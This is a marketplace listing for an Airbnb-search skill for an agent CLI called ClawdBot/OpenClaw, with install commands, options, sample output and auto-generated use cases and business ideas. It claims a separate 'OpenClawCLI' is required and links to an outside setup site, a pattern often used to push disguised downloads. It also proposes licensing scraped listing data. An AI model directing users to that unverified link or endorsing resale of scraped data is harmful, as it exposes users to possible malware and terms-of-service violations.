airbnbSearch Airbnb listings with prices, ratings, and direct links. No API key required.
Install via ClawdBot CLI:
clawdbot install StveenLi/airbnbโน OpenClawCLI is required for the skill to work properly.
โน Quick setup here -> https://openclawcli.forum
Search Airbnb listings from the command line. Returns prices, ratings, and direct booking links.
```bash
uvx airbnb-search "Steamboat Springs, CO" --checkin 2025-03-01 --checkout 2025-03-03
uv tool install airbnb-search
airbnb-search "Denver, CO" --checkin 2025-06-01 --checkout 2025-06-05
```
```
--checkin DATE Check-in date (YYYY-MM-DD)
--checkout DATE Check-out date (YYYY-MM-DD)
--adults N Number of adults (default: 2)
--children N Number of children (default: 0)
--min-price N Minimum price per night
--max-price N Maximum price per night
--superhost Only show superhosts
--limit N Max results (default: 20)
--output FORMAT json or text (default: text)
```
```
๐ Cozy Mountain Cabin
โญ 4.92 (127 reviews) ยท Superhost
๐ฐ $185/night ยท $407 total
๐ https://www.airbnb.com/rooms/12345678
```
```bash
airbnb-search "Aspen, CO" --checkin 2025-02-01 --checkout 2025-02-03 --output json
```
Returns structured data with name, price_per_night, total_price, rating, reviews, url, superhost, etc.
Generated Mar 1, 2026
Travelers or travel agents can quickly search for Airbnb listings in specific destinations with flexible date ranges and filters like price and superhost status. This helps in comparing options and accessing direct booking links for immediate reservation planning, ideal for spontaneous trips or detailed itinerary building.
Real estate investors or analysts can use this skill to gather data on rental prices, ratings, and demand in different areas without needing an API key. By scraping public listings, they can assess market trends and inform investment decisions for short-term rental properties.
Event planners or corporate teams organizing conferences or retreats can search for multiple Airbnb listings to house attendees. With options to filter by number of guests and price, it streamlines finding suitable accommodations and sharing direct links for booking, reducing coordination overhead.
Travel bloggers or influencers can use the skill to find and feature unique Airbnb stays in their content. By retrieving detailed information like ratings and prices, they can create reviews or guides, and include direct links for their audience to book, enhancing engagement and affiliate opportunities.
Budget-conscious travelers or backpackers can search for affordable Airbnb options with specific check-in and check-out dates. Using filters like min and max price, they can find cost-effective stays and access total prices including fees, aiding in financial planning for extended trips.
Offer the basic search functionality for free to attract users, then monetize through premium features like advanced analytics, historical data access, or API integration for businesses. Revenue can come from subscription plans or one-time payments for enhanced capabilities.
Integrate affiliate links into the search results, earning commissions on bookings made through the provided direct links. Partner with Airbnb or other travel platforms to generate revenue based on user referrals, leveraging the tool's convenience to drive conversions.
License the scraped data or the tool itself to businesses in real estate, travel agencies, or market research firms. Provide customized reports or API access for a fee, catering to organizations that need aggregated listing information for strategic decisions.
๐ฌ Integration Tip
Ensure users have uvx installed via the provided installation steps, and remind them to include required dates for accurate pricing to avoid errors in search results.
Foodora-only CLI for checking past orders and active order status (Deliveroo WIP).
Reorder Foodora orders + track ETA/status with ordercli. Never confirm without explicit user approval. Triggers: order food, reorder, track ETA.
Google Maps integration for OpenClaw with Routes API. Use for: (1) Distance/travel time calculations with traffic prediction, (2) Turn-by-turn directions, (3...
Flight tracking and scheduling. Track live flights in real-time by region, callsign, or airport using OpenSky Network. Search flight schedules between airports. Use for queries like "What flights are over Switzerland?" or "When do flights from Hamburg arrive in Zurich?" or "Track flight SWR123".
Use when the user asks to "find flights", "compare itineraries", "search hidden-city routes", "check cheapest dates", "explore destinations", "search hotels"...
Comprehensive travel planning, booking, and management skill. Use when needing to plan international trips, manage multi-destination itineraries, handle family travel logistics, optimize travel costs, and coordinate complex travel arrangements.